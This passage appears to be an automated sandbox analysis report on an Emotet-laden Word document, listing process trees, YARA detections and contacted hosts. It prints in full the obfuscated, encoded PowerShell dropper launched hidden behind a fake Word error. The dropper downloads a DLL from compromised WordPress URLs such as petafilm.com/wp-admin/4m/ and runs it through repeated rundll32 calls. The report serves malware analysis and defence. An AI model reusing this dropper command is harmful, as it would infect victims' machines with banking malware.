JwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004C5A cpuid 7_2_10004C5A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter, 7_2_10007D46
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 336501 Sample: bestand-8881014518 00944.doc Startdate: 06/01/2021 Architecture: WINDOWS Score: 100 53 Multi AV Scanner detection for domain / URL 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 12 other signatures 2->59 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 25 2->17         started        process3 signatures4 73 Suspicious powershell command line found 14->73 75 Very long command line found 14->75 77 Encrypted powershell cmdline option found 14->77 79 PowerShell case anomaly found 14->79 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process5 dnsIp6 51 petafilm.com 176.53.69.151, 49165, 80 RADORETR Turkey 19->51 49 C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll, PE32 19->49 dropped 63 Powershell drops PE file 19->63 26 rundll32.exe 19->26         started        file7 signatures8 process9 process10 28 rundll32.exe 15 26->28         started        signatures11 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->71 31 rundll32.exe 5 28->31         started        process12 signatures13 83 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->83 34 rundll32.exe 5 31->34         started        process14 signatures15 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->61 37 rundll32.exe 5 34->37         started        process16 signatures17 65 Hides that the sample has been downloaded from the Internet (zone.identifier) 37->65 40 rundll32.exe 5 37->40         started        process18 signatures19 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->67 43 rundll32.exe 5 40->43         started        process20 signatures21 69 Hides that the sample has been downloaded from the Internet (zone.identifier) 43->69 46 rundll32.exe 5 43->46         started        process22 signatures23 81 Hides that the sample has been downloaded from the Internet (zone.identifier) 46->81
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
176.53.69.151
 unknown Turkey
42926 RADORETR true

Contacted Domains

Name IP Active
petafilm.com 176.53.69.151 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://petafilm.com/wp-admin/4m/ true
  • Avira URL Cloud: malware
 unknown